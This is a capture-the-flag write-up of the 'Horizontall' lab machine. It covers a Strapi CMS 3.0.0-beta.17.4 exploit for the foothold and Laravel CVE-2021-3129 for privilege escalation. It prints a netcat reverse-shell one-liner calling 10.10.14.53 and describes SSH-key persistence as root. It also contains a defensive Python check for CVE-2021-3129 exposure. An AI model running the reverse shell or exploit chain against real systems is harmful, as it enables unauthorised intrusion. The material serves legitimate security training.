kedaegan.github.io

Horizontall

Enumeration

Ports and Services

Software Installed:

Nmap Scan Results:

Gobuster:

VHosts:

Gobuster - api-prod.horizontall.htb:

Nikto:

From /admin/init I can get the version:

Initial Foothold

Strapi CMS 3.0.0-beta.17.4 is vulnerable to both a password reset and a remote code execution vulnerability.

Exploit-DB has a Python script that resets the admin password and allows remote code execution:
https://www.exploit-db.com/exploits/50239

Rev Shell:
Executed nc
CMD: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.53 8888

/tmp/f

Found a password in:
/opt/strapi/myapi/config/environments/development/database.json

Created and uploaded an SSH key for the strapi user

User.txt Proof Screenshot

Privilege Escalation

Port 8000 is hosting Laravel Framework:

This version of Laravel is vulnerable to RCE (CVE-2021-3129):

https://github.com/nth347/CVE-2021-3129_exploit
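
A defender-side check for the condition behind CVE-2021-3129, as an added example that is not part of the original write-up: per the CVE description the flaw is in Ignition before 2.5.2 and is reachable when debug mode is on, so the script reads a project's composer.lock and .env and classifies the deployment. The function names, status labels and sample inputs are constructed for illustration; any fix back-ported to an older Ignition branch is not modelled, so such versions would be over-reported.

```python
import json
import re

# Per the CVE-2021-3129 description: Ignition before 2.5.2, with debug mode on.
FIXED_IGNITION = (2, 5, 2)
FALSY = {"", "0", "false", "(false)", "null", "(null)", "empty", "(empty)"}

def parse_version(text):
    """Turn 'v2.5.1' or '2.5.1' into a comparable 3-tuple of ints."""
    nums = [int(n) for n in re.findall(r"\d+", text.split("-")[0])[:3]]
    return tuple(nums + [0] * (3 - len(nums)))

def ignition_version(composer_lock_text):
    """Return the locked facade/ignition version, or None if not installed."""
    lock = json.loads(composer_lock_text)
    for pkg in lock.get("packages", []) + lock.get("packages-dev", []):
        if pkg.get("name") == "facade/ignition":
            return parse_version(pkg.get("version", "0"))
    return None

def debug_enabled(env_text):
    """Conservative: APP_DEBUG counts as on unless its value is clearly false."""
    for line in env_text.splitlines():
        key, sep, value = line.strip().partition("=")
        if sep and key.strip() == "APP_DEBUG":
            return value.strip().strip("\"'").lower() not in FALSY
    return False  # unset is treated as off (assumed framework default)

def assess(composer_lock_text, env_text):
    """Classify one deployment from its composer.lock and .env contents."""
    version = ignition_version(composer_lock_text)
    if version is None:
        return "not-installed"
    if version >= FIXED_IGNITION:
        return "patched"
    return "exposed" if debug_enabled(env_text) else "outdated-debug-off"

# Constructed sample inputs, not taken from the target in this write-up.
SAMPLE_LOCK = json.dumps({"packages": [
    {"name": "laravel/framework", "version": "v8.4.0"},
    {"name": "facade/ignition", "version": "2.5.1"}], "packages-dev": []})
SAMPLE_ENV = "APP_NAME=Laravel\nAPP_ENV=local\nAPP_DEBUG=true\n"

if __name__ == "__main__":
    print(assess(SAMPLE_LOCK, SAMPLE_ENV))
```

An "outdated-debug-off" result still calls for an upgrade, since a later configuration change that turns debug back on would re-expose the application.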

Copied SSH key from strapi to root:

SSH as root:

Root Screenshot Here: